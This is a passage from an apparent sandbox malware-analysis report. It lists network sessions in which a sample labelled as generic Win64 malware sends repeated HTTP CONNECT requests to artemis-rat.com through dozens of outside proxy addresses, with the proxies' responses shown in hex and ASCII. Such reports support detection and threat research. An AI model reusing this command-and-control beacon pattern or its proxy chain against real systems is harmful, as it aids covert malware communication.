                                              177192.168.2.45048038.162.14.20031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.815237045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.239278078 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              178192.168.2.450464174.75.211.22241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.817589045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              179192.168.2.450375200.43.231.441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.825889111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              180192.168.2.450508148.72.23.5648337284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.827274084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              181192.168.2.4504223.37.125.7631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.833692074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.150731087 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              182192.168.2.450601104.16.143.127807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.836824894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.991112947 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              183192.168.2.450604199.60.103.160807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.837970018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.992244005 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              184192.168.2.45051023.19.244.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.840007067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              185192.168.2.450610104.22.37.236807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.840365887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.994342089 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              186192.168.2.450642104.16.104.12807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.856028080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.010633945 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              187192.168.2.450647203.30.189.85807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.858902931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.013194084 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              188192.168.2.45040647.100.236.2380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.860570908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.212759018 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              189192.168.2.450388183.230.162.12290917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.864867926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.616173029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.725584984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069829941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554486036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054341078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.434154987 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              190192.168.2.450503184.181.217.21041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.870531082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              191192.168.2.450471213.136.79.177353587284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.885816097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.569297075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.538090944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.569737911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570234060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.554027081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.569616079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.366276026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.866306067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              192192.168.2.450678104.20.233.70807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.897030115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.051489115 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              193192.168.2.45059638.162.24.1231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.897416115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.327184916 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              194192.168.2.4508744.182.9.1084437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.900883913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              195192.168.2.4508814.182.9.1084437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.901890039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              196192.168.2.450645154.12.253.232574477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.917126894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.428663015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.053687096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.366513968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
